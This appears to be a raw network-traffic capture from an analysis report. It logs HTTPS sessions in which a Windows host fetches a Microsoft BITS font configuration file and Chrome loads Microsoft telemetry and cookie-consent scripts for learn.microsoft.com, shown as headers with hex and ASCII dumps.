                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T29nEHLdm80I3ZLFR4Tr1chUKc0pmj8hZD4aZPAKqpUCicMU5LO2rZ9y8yKfimpb7W1wSS8EcN4kquHLZsdyw%2FecxVzkjV1bRoYY5M%2B0Gdy6XT8HDkNTdGNYKzRF8O1mmJt%2Fr0E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94f916e438c84-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2299&min_rtt=2001&rtt_var=1346&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=990&delivery_rate=665754&cwnd=166&unsent_bytes=0&cid=5dc9c70b6a20cabe&ts=1099&x=0"
                                                                                                                                                                                                        2024-12-02 06:37:53 UTC214INData Raw: 64 30 0d 0a 54 33 66 69 41 36 35 6c 32 32 31 79 6a 37 52 41 34 58 66 67 4e 66 35 33 5a 5a 59 37 6d 4e 57 6b 47 63 35 42 43 76 39 6d 36 69 6f 55 44 4d 42 32 6a 46 2f 35 42 51 62 37 78 48 71 39 57 4c 77 61 7a 30 39 51 75 41 6d 70 34 49 6f 6f 2f 33 49 6b 7a 6c 43 32 42 53 41 52 68 46 2b 42 41 62 34 4c 58 4f 72 4d 4a 63 4e 62 77 6c 4f 4b 56 56 2b 6d 46 37 71 77 68 69 50 2f 50 43 61 45 52 4a 38 49 64 56 57 4b 64 39 6f 56 34 54 46 64 30 35 74 78 32 55 4c 4f 42 38 39 43 53 36 63 4b 71 2f 75 56 4c 35 4a 75 65 59 73 44 69 30 63 54 57 4a 42 69 77 41 47 30 41 46 7a 71 7a 43 58 44 57 38 4a 54 69 6c 56 66 70 68 65 36 73 49 59 6a 2f 6a 78 58 0d 0a
                                                                                                                                                                                                        Data Ascii: d0T3fiA65l221yj7RA4XfgNf53ZZY7mNWkGc5BCv9m6ioUDMB2jF/5BQb7xHq9WLwaz09QuAmp4Ioo/3IkzlC2BSARhF+BAb4LXOrMJcNbwlOKVV+mF7qwhiP/PCaERJ8IdVWKd9oV4TFd05tx2ULOB89CS6cKq/uVL5JueYsDi0cTWJBiwAG0AFzqzCXDW8JTilVfphe6sIYj/jxX
                                                                                                                                                                                                        2024-12-02 06:37:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        9192.168.2.84973323.218.208.109443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:13 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                        2024-12-02 06:38:14 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                        X-OSID: 2
                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                        X-CCC: GB
                                                                                                                                                                                                        Cache-Control: public, max-age=132506
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:14 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        X-CID: 2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        10192.168.2.84973623.218.208.109443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:15 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                        2024-12-02 06:38:16 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                        X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                        Cache-Control: public, max-age=192428
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:16 GMT
                                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                        2024-12-02 06:38:16 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        11192.168.2.84974013.107.246.634431524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:16 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:16 GMT
                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        x-azure-ref: 20241202T063816Z-174f7845968xr5c2hC1EWRd0hn0000000ntg00000000dnmx
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                        Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                        Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                        Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                        Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                        Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                        Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                        Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                        Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                        Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        12192.168.2.84974113.107.246.634431524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:16 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:16 GMT
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                        Age: 41562
                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-request-id: ea98da45-d01e-00c3-3b23-44341b000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-azure-ref: 20241202T063816Z-174f7845968qj8jrhC1EWRh41s000000143g000000000b88
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
